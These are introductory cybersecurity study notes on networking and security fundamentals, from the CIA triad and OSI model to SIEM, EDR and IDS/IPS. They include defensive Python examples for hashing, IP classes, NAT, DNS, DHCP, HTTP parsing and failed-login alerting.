Study Material


CIA Triad

■ Confidentiality → Ensures information is accessible only to authorized personnel (e.g., encryption)

■ Integrity → Ensures data remains accurate and unaltered (e.g., checksums)
Example:
1. Create a blank file and check its hash value.
2. Open the same file, add a single line, and check its hash value again.
3. Compare both hash values: they are different.
■ Availability → Ensures information and resources are accessible when needed (e.g., redundancy measures)
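The three-step hash check from the Integrity example, worked through in code. This is an added example, not part of the study material; it uses in-memory bytes in place of a file on disk and SHA-256 as the checksum.

```python
import hashlib
from typing import Tuple


def sha256_hex(data: bytes) -> str:
    """Return the SHA-256 digest of the given bytes as a hex string."""
    return hashlib.sha256(data).hexdigest()


def verify_integrity(data: bytes, expected_hex: str) -> bool:
    """Integrity check: recompute the hash and compare it with the value recorded earlier.
    Any change to the data, however small, produces a different digest."""
    return sha256_hex(data) == expected_hex


def hash_demo() -> Tuple[str, str]:
    """Replay the three steps from the notes on in-memory data instead of a file on disk."""
    blank_file = b""                              # step 1: a blank (empty) file
    baseline = sha256_hex(blank_file)
    modified_file = blank_file + b"one line\n"    # step 2: the same file with one line added
    changed = sha256_hex(modified_file)
    return baseline, changed                      # step 3: the two values differ


if __name__ == "__main__":
    before, after = hash_demo()
    print("blank file    :", before)
    print("after one line:", after)
    print("unchanged?    :", verify_integrity(b"one line\n", before))
```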

---------------------------------------------------------------------------------------------------------------------------------------------------

***************************************************************
---------------------------------------------------------------------------------------------------------------------------------------------------
Triple A’s of Security
■ Authentication → Verifying the identity of a user or system (e.g., password checks)
■ Authorization → Determining actions or resources an authenticated user can access (e.g., permissions)
■ Accounting → Tracking user activities and resource usage for audit or billing purposes.
---------------------------------------------------------------------------------------------------------------------------------------------------

***************************************************************
---------------------------------------------------------------------------------------------------------------------------------------------------
Security Control Types

■ Preventative
■ Deterrent
■ Detective
■ Corrective
■ Compensating
■ Directive
---------------------------------------------------------------------------------------------------------------------------------------------------

***************************************************************
---------------------------------------------------------------------------------------------------------------------------------------------------
Zero Trust Model
■ Operates on the principle that no one should be trusted by default
■ To achieve zero trust, we use the control plane and the data plane
● Control Plane
○ Adaptive identity, threat scope reduction, policy-driven access control, and secured zones
● Data Plane
○ Subject/system, policy engine, policy administrator, and establishing policy enforcement points
---------------------------------------------------------------------------------------------------------------------------------------------------

***************************************************************
---------------------------------------------------------------------------------------------------------------------------------------------------

System Ports
IP and their classes
Gateway scenario example
Common port numbers
Offensive & Defensive Define
Blue team & Red Team Define

1. System Ports

System ports refer to logical channels that allow networked devices to communicate with each other. Ports are
associated with an IP address and protocol type (e.g., TCP or UDP). They are used to differentiate types of
traffic, making sure that data is directed to the correct services.

- Port Numbers: Ports are numbered from 0 to 65535 and are split into different categories:

- Well-Known Ports (0-1023): These are reserved for core services like HTTP (port 80), HTTPS (port 443),
DNS (port 53), etc.

- Registered Ports (1024-49151): These ports can be registered by software companies for their applications.
Examples include MySQL (3306) and RDP (3389).

- Dynamic/Private Ports (49152-65535): These are temporary ports usually assigned to client software during
communication.

2. IP and Their Classes

An IP (Internet Protocol) address is a unique identifier assigned to each device on a network. The IP address is
divided into two versions:

- IPv4: It uses 32-bit addressing and has around 4.3 billion possible addresses.

- IPv6: A 128-bit address that provides a much larger address space.

IPv4 addresses are further categorized into classes based on the number of hosts and networks required.

- Class A:

Range: 1.0.0.0 to 126.0.0.0

Default Subnet Mask: 255.0.0.0

Supports a large number of hosts on a small number of networks (used by very large organizations).

- Class B:

Range: 128.0.0.0 to 191.255.0.0

Default Subnet Mask: 255.255.0.0

Suitable for medium-sized networks (universities, large businesses).

- Class C:

Range: 192.0.0.0 to 223.255.255.0

Default Subnet Mask: 255.255.255.0

Supports a large number of small networks with fewer hosts per network (common for small
organizations).

- Class D:

Range: 224.0.0.0 to 239.255.255.255

Used for multicast.

- Class E:

Range: 240.0.0.0 to 255.255.255.255

Reserved for research and future use.
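A small lookup that applies the port ranges from section 1 and the classful IPv4 ranges from section 2. This is an added example, not from the study material; 0.x.x.x and 127.x.x.x (loopback) fall outside the Class A range given above, so the code reports them separately.

```python
from typing import Optional, Tuple


def port_category(port: int) -> str:
    """Classify a TCP/UDP port number into the three ranges listed in the notes."""
    if not 0 <= port <= 65535:
        raise ValueError(f"port out of range: {port}")
    if port <= 1023:
        return "well-known"
    if port <= 49151:
        return "registered"
    return "dynamic/private"


def _octets(address: str) -> Tuple[int, ...]:
    """Parse a dotted quad strictly; reject anything that is not four octets in 0..255."""
    parts = address.split(".")
    if len(parts) != 4:
        raise ValueError(f"not a dotted quad: {address!r}")
    try:
        values = tuple(int(p) for p in parts)
    except ValueError:
        raise ValueError(f"non-numeric octet in: {address!r}") from None
    if any(not 0 <= v <= 255 for v in values):
        raise ValueError(f"octet out of range in: {address!r}")
    return values


def ipv4_class(address: str) -> Tuple[str, Optional[str]]:
    """Return (class, default subnet mask) using the classful ranges from the notes.
    Classes D and E have no default mask, so None is returned for them."""
    first = _octets(address)[0]
    if first == 0:
        return "reserved (0.0.0.0/8)", None
    if first == 127:
        return "loopback (127.0.0.0/8)", None
    if first <= 126:
        return "A", "255.0.0.0"
    if first <= 191:
        return "B", "255.255.0.0"
    if first <= 223:
        return "C", "255.255.255.0"
    if first <= 239:
        return "D (multicast)", None
    return "E (reserved)", None


def network_address(address: str) -> Optional[str]:
    """Apply the default classful mask to get the network part (None where no mask applies)."""
    _, mask = ipv4_class(address)
    if mask is None:
        return None
    masked = (a & m for a, m in zip(_octets(address), _octets(mask)))
    return ".".join(str(v) for v in masked)


if __name__ == "__main__":
    for p in (80, 3306, 50000):
        print(p, port_category(p))
    for ip in ("10.1.2.3", "172.16.5.4", "192.168.1.10", "224.0.0.1"):
        print(ip, ipv4_class(ip), network_address(ip))
```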

3. Gateway Scenario Example

A gateway is a network device that acts as a bridge between two networks using different protocols. It can be a
router, firewall, or a server.

Scenario:

Imagine you have a private network (192.168.1.0/24) with several devices connected to the internet via
a router. The router acts as a gateway. When a computer on the private network sends a request to a
web server (like google.com), the following occurs:

- The computer sends the data to its default gateway (router).
- The router translates the private IP to a public IP using NAT (Network Address Translation).
- The router forwards the request to the public network (internet) via the ISP.
- The router receives the response and sends it back to the originating device within the private
network.
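The gateway scenario above as a tiny NAT translation table. This is an added example, not from the study material; the public IP 203.0.113.5 and the web server 198.51.100.10 are constructed documentation addresses, and a reply with no matching table entry is dropped, which is the behaviour that keeps unsolicited inbound traffic off the private network.

```python
from typing import Dict, Optional, Tuple

Endpoint = Tuple[str, int]   # (IP address, port)


class NatGateway:
    """Minimal port-address-translation table for the gateway scenario in the notes.
    Outbound packets from the private network get their source rewritten to the
    gateway's public IP plus a fresh port; replies are mapped back by that port."""

    def __init__(self, public_ip: str, first_port: int = 40000) -> None:
        self.public_ip = public_ip
        self.next_port = first_port
        self.table: Dict[int, Endpoint] = {}      # public port -> private (ip, port)
        self.reverse: Dict[Endpoint, int] = {}    # private (ip, port) -> public port

    def outbound(self, src: Endpoint, dst: Endpoint) -> Tuple[Endpoint, Endpoint]:
        """Translate a packet leaving the private network, reusing an existing mapping."""
        port = self.reverse.get(src)
        if port is None:
            port = self.next_port
            self.next_port += 1
            self.table[port] = src
            self.reverse[src] = port
        return (self.public_ip, port), dst

    def inbound(self, src: Endpoint, dst: Endpoint) -> Optional[Tuple[Endpoint, Endpoint]]:
        """Translate a reply arriving from the internet. Returns None (drop) when no host
        on the private network opened a matching mapping."""
        if dst[0] != self.public_ip:
            return None
        private = self.table.get(dst[1])
        if private is None:
            return None
        return src, private


def scenario() -> dict:
    """Walk the four steps from the notes with constructed addresses."""
    gw = NatGateway("203.0.113.5")                  # constructed public IP of the router
    laptop = ("192.168.1.20", 51515)                # host on the private 192.168.1.0/24
    web = ("198.51.100.10", 443)                    # constructed web server
    out_src, _ = gw.outbound(laptop, web)           # steps 1 to 3: translate and forward
    reply = gw.inbound(web, out_src)                # step 4: map the response back
    unsolicited = gw.inbound(("198.51.100.99", 80), (gw.public_ip, 12345))
    return {"translated_src": out_src, "reply_to": reply, "unsolicited": unsolicited}


if __name__ == "__main__":
    for key, value in scenario().items():
        print(f"{key}: {value}")
```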

4. Common Port Numbers

Below are some common port numbers and the services they are associated with:

- 20, 21: FTP (File Transfer Protocol) – used for transferring files.
- 22: SSH (Secure Shell) – used for remote command-line login.
- 23: Telnet – an unencrypted remote access protocol.
- 25: SMTP (Simple Mail Transfer Protocol) – used for sending emails.
- 53: DNS (Domain Name System) – used for translating domain names to IP addresses.
- 80: HTTP (Hypertext Transfer Protocol) – used for web traffic.
- 443: HTTPS (HTTP Secure) – used for encrypted web traffic.
- 110: POP3 (Post Office Protocol) – used for retrieving emails from the server.
- 143: IMAP (Internet Message Access Protocol) – another email retrieval protocol.
- 3389: RDP (Remote Desktop Protocol) – used for remote desktop connections.

5. Offensive vs. Defensive Security

- Offensive Security: Involves proactively seeking and exploiting vulnerabilities in systems to improve
security. It includes activities like penetration testing, ethical hacking, red teaming, and social
engineering. The aim is to identify weaknesses before malicious actors do.
- Defensive Security: Involves strategies and technologies to prevent, detect, and mitigate security
threats. This includes firewalls, intrusion detection/prevention systems, monitoring, incident response,
and vulnerability management. The goal is to protect systems from attacks.

6. Blue Team vs. Red Team

- Blue Team:
- The defensive side of cybersecurity. The blue team is responsible for maintaining the security of
the system by implementing defenses, detecting attacks, and mitigating risks. Blue team
members continuously monitor the network for signs of attack, manage logs, and handle
incident response. Their goal is to minimize damage and prevent attackers from compromising
systems.
- Red Team:
- The offensive side of cybersecurity. The red team acts as ethical hackers, simulating real-world
cyber-attacks on a company’s infrastructure to identify vulnerabilities. The red team mimics
adversaries using techniques such as phishing, social engineering, or exploiting system flaws to
test and improve the organization’s defenses.

In a Red Team vs. Blue Team exercise, both teams collaborate to enhance an organization's security posture:
the red team exposes weaknesses, while the blue team strengthens the defenses based on lessons learned.

---------------------------------------------------------------------------------------------------------------------------------------------------

***************************************************************
---------------------------------------------------------------------------------------------------------------------------------------------------

OSI Layer
CKC cyber kill chain
MITRE Framework
DNS diagram
FQDN - PQDN
DHCP
DMZ diagram

1. OSI Model (Open Systems Interconnection Model)

The OSI Model is a conceptual framework used to understand network interactions in seven distinct
layers. Each layer serves a specific function in the process of communication between two devices over
a network.

OSI Layers (from Layer 7 to Layer 1):

- Layer 7 – Application Layer: Deals with network services directly related to applications.
Protocols include HTTP, FTP, SMTP, etc. This is where users interact with network services.
- Layer 6 – Presentation Layer: Transforms data into a format that the application layer can
accept. It handles data encryption, decryption, compression, and translation.
- Layer 5 – Session Layer: Manages sessions between applications on different devices. This
layer establishes, maintains, and terminates sessions.
- Layer 4 – Transport Layer: Provides reliable data transfer through mechanisms like flow
control, error handling, and segmentation of data. Protocols: TCP (reliable) and UDP
(unreliable).
- Layer 3 – Network Layer: Handles logical addressing (IP addresses) and routes packets
across different networks. Protocols: IP, ICMP, ARP.
- Layer 2 – Data Link Layer: Ensures data transfer between adjacent nodes within the same
network using MAC addresses. It also manages error detection and frame synchronization.
Protocols: Ethernet, Wi-Fi.
- Layer 1 – Physical Layer: Deals with the transmission of raw bitstreams over physical
mediums such as cables, radio frequencies, and fiber optics.

2. Cyber Kill Chain (CKC)

The Cyber Kill Chain is a framework created by Lockheed Martin that describes the stages of a
cyberattack, from reconnaissance to exfiltration. It's commonly used in offensive security to understand
an adversary's tactics and for defenders to break the chain.

Stages of the Cyber Kill Chain:

1. Reconnaissance: Attackers gather intelligence on targets, identifying weaknesses and potential
attack vectors.
2. Weaponization: The attacker develops malware, such as a virus or exploit, that will be used in
the attack.
3. Delivery: The attacker delivers the weapon via email attachments, web links, or removable
devices.
4. Exploitation: The malicious payload is executed on the target's system, exploiting vulnerabilities.
5. Installation: The malware or backdoor is installed, providing persistent access to the attacker.
6. Command and Control (C2): The attacker establishes communication with the infected system
to control it remotely.
7. Actions on Objectives: The attacker carries out the intended action, such as data exfiltration,
destruction, or manipulation of data.

3. MITRE ATT&CK Framework

The MITRE ATT&CK Framework is a knowledge base of tactics and techniques that attackers use
across various stages of a cyberattack. It is widely used for threat intelligence, red teaming, and
improving defense mechanisms.

Key Components:

- Tactics: Goals that attackers aim to achieve, like initial access, persistence, or privilege
escalation.
- Techniques: Specific methods used to accomplish a tactic, like spear phishing or exploiting
software vulnerabilities.
- Sub-techniques: Variants of a technique with more granular details on how attackers execute a
specific action.

MITRE ATT&CK is useful for mapping security incidents, developing detection mechanisms, and
improving response plans based on real-world attack scenarios.

4. DNS Diagram

DNS (Domain Name System) translates human-readable domain names (like `example.com`) into
machine-readable IP addresses.

Components of DNS:

- Root DNS Server: The top-level server that directs queries to TLD (Top-Level Domain) servers
(e.g., `.com`, `.org`).
- TLD DNS Server: It holds information for domain extensions like `.com` and forwards requests
to authoritative name servers.
- Authoritative DNS Server: Holds specific DNS records for domain names and returns the IP
address or other records.

DNS Query Process:

1. User requests a domain (like `www.example.com`).
2. DNS resolver queries the Root DNS Server.
3. The request is forwarded to the TLD server (e.g., `.com`).
4. The authoritative DNS server provides the IP address for `example.com`.
5. The resolver returns the IP to the user’s browser to initiate the connection.

5. FQDN and PQDN

- FQDN (Fully Qualified Domain Name): A domain name that specifies its exact location in the DNS
hierarchy, including all domain levels. It ends with a dot representing the root. Example:
`www.example.com.`
- PQDN (Partially Qualified Domain Name): A domain name that doesn’t include all levels of the DNS
hierarchy and is relative to a root domain or another part of the hierarchy. Example: `example.com` or
`www` (depending on the context).
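The five-step DNS query process and the FQDN/PQDN distinction from sections 4 and 5, simulated with constructed zone data. This is an added example, not from the study material; the three server tiers are plain dictionaries, `example.com.` is an assumed local search domain used to complete a bare PQDN such as `www`, and the answer 192.0.2.10 is a documentation address, not a real host.

```python
from typing import Dict, List, Optional, Tuple

# Constructed zone data standing in for the three server tiers described in the notes.
ROOT_SERVER: Dict[str, str] = {"com.": "tld-com"}                 # TLD -> TLD server name
TLD_SERVERS: Dict[str, Dict[str, str]] = {
    "tld-com": {"example.com.": "ns1.example.com."}               # zone -> authoritative server
}
AUTHORITATIVE: Dict[str, Dict[str, str]] = {
    "ns1.example.com.": {"www.example.com.": "192.0.2.10", "example.com.": "192.0.2.10"}
}
SEARCH_DOMAIN = "example.com."   # assumed search domain used to complete PQDNs


def is_fqdn(name: str) -> bool:
    """An FQDN ends with the dot that stands for the DNS root."""
    return name.endswith(".")


def qualify(name: str, search_domain: str = SEARCH_DOMAIN) -> str:
    """Complete a PQDN into an FQDN. Simplified ndots=1 rule: a bare label such as 'www'
    gets the search domain appended; a name that already contains a dot is treated as
    absolute and only gains the trailing root dot."""
    if is_fqdn(name):
        return name
    if "." in name:
        return name + "."
    return f"{name}.{search_domain}"


def resolve(name: str) -> Tuple[Optional[str], List[str]]:
    """Iterative lookup following the five-step process from the notes. Returns the answer
    (None when no server holds the name) and the servers consulted, in order."""
    fqdn = qualify(name)                                       # step 1: the name to look up
    labels = fqdn.rstrip(".").split(".")
    trail = ["root"]
    tld_server = ROOT_SERVER.get(labels[-1] + ".")             # step 2: root -> TLD referral
    if tld_server is None:
        return None, trail
    trail.append(tld_server)
    zone = ".".join(labels[-2:]) + "."
    auth_server = TLD_SERVERS[tld_server].get(zone)            # step 3: TLD -> authoritative
    if auth_server is None:
        return None, trail
    trail.append(auth_server)
    return AUTHORITATIVE[auth_server].get(fqdn), trail         # step 4: the record itself


if __name__ == "__main__":
    for query in ("www.example.com.", "www", "example.com", "nothing.org."):
        answer, servers = resolve(query)
        print(f"{query:20} -> {answer} via {' -> '.join(servers)}")   # step 5: hand back
```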

6. DHCP (Dynamic Host Configuration Protocol)

DHCP is a network protocol used to assign IP addresses and other network configuration settings (like
default gateway and DNS servers) automatically to devices in a network, without the need for manual
configuration.

How DHCP Works:

1. DHCP Discover: The client device sends a broadcast message looking for a DHCP server.
2. DHCP Offer: The DHCP server responds with an offer, proposing an IP address.
3. DHCP Request: The client accepts the offer and requests the IP address.
4. DHCP Acknowledgement: The server acknowledges and leases the IP address to the client.
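The four-message DHCP exchange above, simulated with both sides in code. This is an added example, not from the study material; the server is a toy with a constructed address pool and no lease timers or broadcasts, and it also shows what happens when the pool is exhausted or a client requests an address the server never offered.

```python
from dataclasses import dataclass, field
from typing import Dict, List, Optional


@dataclass
class DhcpMessage:
    kind: str                       # DISCOVER, OFFER, REQUEST, ACK or NAK
    xid: int                        # transaction id shared by the four messages of one exchange
    client_mac: str
    yiaddr: Optional[str] = None    # address offered / requested / acknowledged
    options: Dict[str, str] = field(default_factory=dict)   # router, dns, ...


class DhcpServer:
    """Toy DHCP server: a pool of free addresses plus a lease table keyed by client MAC."""

    def __init__(self, pool: List[str], router: str, dns: str) -> None:
        self.free = list(pool)
        self.leases: Dict[str, str] = {}
        self.options = {"router": router, "dns": dns}

    def handle(self, msg: DhcpMessage) -> Optional[DhcpMessage]:
        if msg.kind == "DISCOVER":
            # Re-offer a client's existing lease, otherwise the first free address.
            ip = self.leases.get(msg.client_mac) or (self.free[0] if self.free else None)
            if ip is None:
                return None                       # pool exhausted: no offer is made
            return DhcpMessage("OFFER", msg.xid, msg.client_mac, ip, dict(self.options))
        if msg.kind == "REQUEST":
            ip = msg.yiaddr
            already_ours = self.leases.get(msg.client_mac) == ip
            if not already_ours and ip not in self.free:
                return DhcpMessage("NAK", msg.xid, msg.client_mac)   # not offered / taken
            if not already_ours:
                self.free.remove(ip)
                self.leases[msg.client_mac] = ip
            return DhcpMessage("ACK", msg.xid, msg.client_mac, ip, dict(self.options))
        return None


def dora(server: DhcpServer, mac: str, xid: int) -> List[str]:
    """Run Discover / Offer / Request / Acknowledge for one client; returns the message
    kinds seen in order, so an exhausted pool shows up as just ['DISCOVER']."""
    seen: List[str] = []
    discover = DhcpMessage("DISCOVER", xid, mac)            # 1. client broadcasts
    seen.append(discover.kind)
    offer = server.handle(discover)                          # 2. server offers an address
    if offer is None:
        return seen
    seen.append(offer.kind)
    request = DhcpMessage("REQUEST", xid, mac, offer.yiaddr) # 3. client accepts the offer
    seen.append(request.kind)
    ack = server.handle(request)                             # 4. server acknowledges / leases
    seen.append(ack.kind)
    return seen


if __name__ == "__main__":
    srv = DhcpServer(["192.168.1.100", "192.168.1.101"], router="192.168.1.1", dns="192.168.1.1")
    for i in range(1, 4):
        mac = f"02:00:00:00:00:0{i}"
        print(mac, dora(srv, mac, xid=i))
    print("leases:", srv.leases)
```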

7. DMZ Diagram

A DMZ (Demilitarized Zone) is a section of a network that acts as a buffer between an
internal network and the external internet. It is used to host services that need to be accessible from the
internet while protecting the internal network from external threats.

Typical DMZ Setup:

- External Firewall: Protects the DMZ from external attacks.
- Internal Firewall: Protects the internal network from any compromised services within the DMZ.
- Servers in the DMZ: Hosts like web servers, FTP servers, or email servers reside here because
they need to be accessible from both the internal network and the internet.

---------------------------------------------------------------------------------------------------------------------------------------------------

***************************************************************
---------------------------------------------------------------------------------------------------------------------------------------------------
HTTP Request & Response
Log types
Application
System
Security
Virus & Threat protection
IOC / IOA
SIEM
EDR Working
Alert type
IDS & IPS

1. HTTP Request & Response

HTTP (Hypertext Transfer Protocol) is the foundation of data communication on the web. It works as a
request-response protocol between a client (usually a web browser) and a server.

HTTP Request

When a client wants to communicate with a server, it sends an HTTP request. The request
consists of the following components:

- Request Line: Includes the HTTP method (e.g., `GET`, `POST`), the requested URL, and the
HTTP version.
- Example: `GET /index.html HTTP/1.1`
- Headers: Provide additional information about the request (e.g., user agent, host, content type).
- Example: `Host: www.example.com`
- Body: Used in certain methods like `POST` to send data to the server (e.g., form submissions or
file uploads).

HTTP Response

The server responds to the client with an HTTP response, which contains the following:

- Status Line: Contains the HTTP version, status code, and status message.
- Example: `HTTP/1.1 200 OK`
- Headers: Provide meta-information like content type, server name, and date.
- Example: `Content-Type: text/html`
- Body: Contains the data or resource requested by the client (e.g., HTML, JSON, images).
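A strict parser for the request and response structure described above (request line or status line, headers, blank line, body). This is an added example, not from the study material; the sample messages are constructed, and the parser rejects messages whose body is shorter than the declared Content-Length instead of guessing, which is the safe behaviour for anything that sits in front of a server.

```python
from dataclasses import dataclass, field
from typing import Dict, Tuple


@dataclass
class HttpRequest:
    method: str
    target: str
    version: str
    headers: Dict[str, str] = field(default_factory=dict)
    body: bytes = b""


@dataclass
class HttpResponse:
    version: str
    status: int
    reason: str
    headers: Dict[str, str] = field(default_factory=dict)
    body: bytes = b""


def _split_message(raw: bytes) -> Tuple[str, Dict[str, str], bytes]:
    """Separate start line, header lines and body at the CRLF CRLF boundary."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("malformed message: missing blank line after headers")
    lines = head.decode("iso-8859-1").split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, colon, value = line.partition(":")
        if not colon or not name.strip():
            raise ValueError(f"malformed header line: {line!r}")
        headers[name.strip().lower()] = value.strip()   # header names are case-insensitive
    return lines[0], headers, body


def parse_request(raw: bytes) -> HttpRequest:
    """Parse 'METHOD target HTTP/x.y' plus headers; honour Content-Length for the body."""
    start, headers, body = _split_message(raw)
    parts = start.split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        raise ValueError(f"malformed request line: {start!r}")
    method, target, version = parts
    if "content-length" in headers:
        length = int(headers["content-length"])
        if length < 0 or length > len(body):
            raise ValueError("body does not match Content-Length")
        body = body[:length]                       # ignore anything beyond the declared length
    return HttpRequest(method, target, version, headers, body)


def parse_response(raw: bytes) -> HttpResponse:
    """Parse 'HTTP/x.y status reason' plus headers and body."""
    start, headers, body = _split_message(raw)
    parts = start.split(" ", 2)
    if len(parts) < 2 or not parts[0].startswith("HTTP/"):
        raise ValueError(f"malformed status line: {start!r}")
    reason = parts[2] if len(parts) == 3 else ""
    return HttpResponse(parts[0], int(parts[1]), reason, headers, body)


def is_well_formed_request(raw: bytes) -> bool:
    """True when the bytes parse as a request under the rules above."""
    try:
        parse_request(raw)
        return True
    except ValueError:
        return False


# Constructed sample messages (not captured traffic).
SAMPLE_REQUEST = (b"POST /login HTTP/1.1\r\nHost: www.example.com\r\n"
                  b"Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 21\r\n\r\n"
                  b"user=alice&role=guest")
SAMPLE_RESPONSE = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nServer: demo\r\n\r\n"
                   b"<html></html>")

if __name__ == "__main__":
    print(parse_request(SAMPLE_REQUEST))
    print(parse_response(SAMPLE_RESPONSE))
```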

2. Log Types

Logs are records generated by systems, applications, or devices to provide insight into their functioning
and any issues they may encounter. Logs are crucial for monitoring and troubleshooting.

Application Logs

- These logs are created by software applications and record events specific to the functioning of
the app. They can track user activity, application errors, and operational details.
- Example: A web server log recording incoming HTTP requests or an application
reporting performance issues.

System Logs

- Generated by the operating system to document activities like system startup, shutdown,
hardware failures, or driver installations.
- Example: Windows Event Viewer logs showing service start-ups, or Linux system logs
(`/var/log/syslog`) tracking kernel activities.

Security Logs

- These logs record events related to system and network security, such as login attempts
(successful or failed), unauthorized access attempts, or changes to security policies.
- Example: Audit logs that record user authentication details, system changes, and policy
updates.

3. Virus & Threat Protection

Virus and Threat Protection is a security feature typically offered by antivirus software that safeguards
systems against malware, viruses, and other threats. Modern antivirus software typically provides:

- Real-time protection: Constant monitoring for threats in files, memory, and network traffic.
- Scheduled scanning: Regular scans of the system to detect hidden threats.
- Threat mitigation: Quarantine or removal of malicious files.
- Threat intelligence: Using databases of known malware signatures and behaviors to detect new
threats.
- Examples of such tools include Microsoft Defender, Norton, and Kaspersky.

4. IOC (Indicators of Compromise) & IOA (Indicators of Attack)

These terms are used in cybersecurity to identify signs of potential threats:

IOC (Indicators of Compromise)

- Specific artifacts or evidence that indicate a system or network has been breached. They help in
identifying whether an attack has already occurred.
- Examples: Malware signatures, unusual outbound traffic, file hash values of known
malware, or changes in registry keys.

IOA (Indicators of Attack)

- Behavioral indicators that suggest malicious activity is taking place, focusing more on detecting
and mitigating attacks in progress rather than after the fact.
- Examples: Unusual login attempts, lateral movement across systems, unauthorized
privilege escalation.

5. SIEM (Security Information and Event Management)

SIEM is a technology that aggregates, correlates, and analyzes log data from across the network to
provide real-time security monitoring and incident response.

SIEM Functions:

- Log Aggregation: Collects logs and event data from various systems, applications, firewalls, and
network devices.
- Event Correlation: Analyzes logs to identify relationships between events to detect suspicious
patterns.
- Alerting: Notifies security teams when anomalous or suspicious activities are detected.
- Incident Management: Helps in tracking and responding to security incidents in an organized
manner.
- Forensic Analysis: Allows investigators to search historical logs for threat hunting and
post-incident investigation.

Popular SIEM tools include Splunk, IBM QRadar, and ArcSight.

6. EDR (Endpoint Detection and Response) Working

EDR is a security solution focused on detecting, investigating, and responding to security incidents on
endpoints (workstations, laptops, servers, etc.).

How EDR Works:

- Continuous Monitoring: EDR tools continuously monitor endpoint activities (file changes,
process creation, network connections).
- Threat Detection: Uses behavioral analysis, machine learning, and threat intelligence to detect
abnormal activities like malware execution or suspicious user behavior.
- Alerting: When an anomaly is detected, the EDR system raises an alert for the security team to
investigate.
- Response Capabilities: Many EDR solutions allow for immediate response actions like isolating
the endpoint, killing processes, or removing malicious files.
- Examples of EDR solutions include CrowdStrike Falcon, Carbon Black, and Microsoft Defender
for Endpoint.

7. Alert Types

In cybersecurity, different alert types are generated based on the severity and nature of the detected
threats:

- Informational Alert: These alerts are non-critical and provide general information about the
normal operation of the system.
- Example: A system successfully completed a scheduled task.
- Warning Alert: Indicates that an abnormal condition has been detected, but it may not be a
critical threat.
- Example: Multiple failed login attempts.
- Critical Alert: These are high-priority alerts that indicate a serious threat or compromise.
Immediate action is required.
- Example: Detection of ransomware activity or unauthorized access to sensitive data.
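The event-correlation function of a SIEM (section 5) and the three alert types above, run over sample log lines. This is an added example, not from the study material; the syslog-style lines are constructed, the rule grades a burst of failed logins from one source as Warning (the example given above) and a successful login right after such a burst as Critical, and the threshold and time window are assumed values.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Any, Dict, List, Optional, Tuple

# Constructed syslog-style lines (not a real capture), in the order a SIEM would receive them.
SAMPLE_LOG = """\
Mar 10 09:00:01 host1 sshd[1201]: Accepted password for alice from 10.0.0.5 port 50211 ssh2
Mar 10 09:01:10 host1 sshd[1210]: Failed password for bob from 203.0.113.7 port 4022 ssh2
Mar 10 09:01:12 host1 sshd[1211]: Failed password for bob from 203.0.113.7 port 4023 ssh2
Mar 10 09:01:15 host1 sshd[1212]: Failed password for invalid user admin from 203.0.113.7 port 4024 ssh2
Mar 10 09:01:17 host1 sshd[1213]: Failed password for bob from 203.0.113.7 port 4025 ssh2
Mar 10 09:01:20 host1 sshd[1214]: Failed password for bob from 203.0.113.7 port 4026 ssh2
Mar 10 09:01:25 host1 sshd[1215]: Accepted password for bob from 203.0.113.7 port 4027 ssh2
Mar 10 09:05:00 host1 CRON[1300]: (root) CMD (run-parts /etc/cron.hourly)
this line is not in syslog format and is counted as unparsed
""".splitlines()

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) (?P<prog>[^\[:]+)(?:\[\d+\])?: (?P<msg>.*)$"
)
FAILED_RE = re.compile(r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)")
ACCEPTED_RE = re.compile(r"Accepted \w+ for (?P<user>\S+) from (?P<ip>\S+)")


def parse_line(line: str) -> Optional[Dict[str, Any]]:
    """Normalize one syslog line into fields; None when the line does not fit the format."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    return {"ts": datetime.strptime(m["ts"], "%b %d %H:%M:%S"), "host": m["host"],
            "prog": m["prog"], "msg": m["msg"]}


def correlate(lines: List[str], threshold: int = 5,
              window: timedelta = timedelta(minutes=2)) -> Dict[str, Any]:
    """Correlate login events per source IP and grade them with the three alert types."""
    failures: Dict[str, List[datetime]] = defaultdict(list)   # recent failures per source IP
    warned = set()                                             # IPs already raised as Warning
    alerts: List[Tuple[str, str]] = []
    unparsed = 0
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            unparsed += 1
            continue
        ts, msg = ev["ts"], ev["msg"]
        failed, accepted = FAILED_RE.search(msg), ACCEPTED_RE.search(msg)
        if failed:
            ip = failed["ip"]
            failures[ip] = [t for t in failures[ip] if ts - t <= window] + [ts]
            if len(failures[ip]) >= threshold and ip not in warned:
                warned.add(ip)
                alerts.append(("Warning", f"{len(failures[ip])} failed logins from {ip} within {window}"))
        elif accepted:
            ip, user = accepted["ip"], accepted["user"]
            recent = [t for t in failures[ip] if ts - t <= window]
            if len(recent) >= threshold:
                alerts.append(("Critical", f"login for {user} from {ip} after {len(recent)} failures"))
            else:
                alerts.append(("Informational", f"login for {user} from {ip} on {ev['host']}"))
    return {"alerts": alerts, "unparsed": unparsed}


if __name__ == "__main__":
    result = correlate(SAMPLE_LOG)
    for severity, text in result["alerts"]:
        print(f"[{severity}] {text}")
    print("unparsed lines:", result["unparsed"])
```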

8. IDS (Intrusion Detection System) & IPS (Intrusion Prevention System)

Both IDS and IPS are network security technologies designed to detect and prevent unauthorized
access or attacks on a network.

IDS (Intrusion Detection System)

- Function: Monitors network traffic and system activities for malicious actions or policy violations.
It generates alerts when suspicious activity is detected.
- Types:
- NIDS (Network-based IDS): Monitors network traffic for threats.
- HIDS (Host-based IDS): Monitors individual devices for suspicious activities.
- Limitation: IDS is passive and only alerts administrators but does not block or stop attacks.

IPS (Intrusion Prevention System)

- Function: An IPS actively monitors and blocks malicious traffic in real time. It sits inline
between the network and the firewall, intercepting and preventing attacks before they can reach
their target.
- Types: Similar to IDS, an IPS can also be network-based (NIPS) or host-based (HIPS).
- Advantage: An IPS takes immediate action to mitigate threats, unlike an IDS, which only alerts the
system.

---------------------------------------------------------------------------------------------------------------------------------------------------

***************************************************************
---------------------------------------------------------------------------------------------------------------------------------------------------

AMSI
Data Link Layer Working
AAA
TLP
TTP

